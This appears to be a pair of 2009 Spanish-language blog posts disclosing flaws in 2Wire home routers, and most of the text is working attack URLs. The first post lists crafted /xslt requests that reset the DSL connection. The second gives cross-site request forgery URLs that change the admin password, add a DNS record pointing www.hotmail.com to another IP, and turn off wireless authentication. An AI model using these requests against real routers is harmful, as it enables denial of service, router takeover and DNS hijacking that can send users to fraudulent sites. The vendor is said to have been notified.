martes, 10 de marzo de 2009

Dsl-DoS

La conexion DSL de los ruteadores 2wire se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z. Ejemplo:
http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
etc...

Modelos Vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway

Software: v3.17.5, 3.7.1, 4.25.19, 5.29.51



miércoles, 4 de marzo de 2009

Vulnerabilidades en ruteadores 2Wire (algunas versiones)

Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway
Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida

http://www.2wire.com fue Notificado



I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.


II. Vulnerabilidad
----------------

Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.

No valida POST ni Referer ni nada.


III. "Exploit"
--------

Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.


[ejemplos]

Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS

Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99

Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0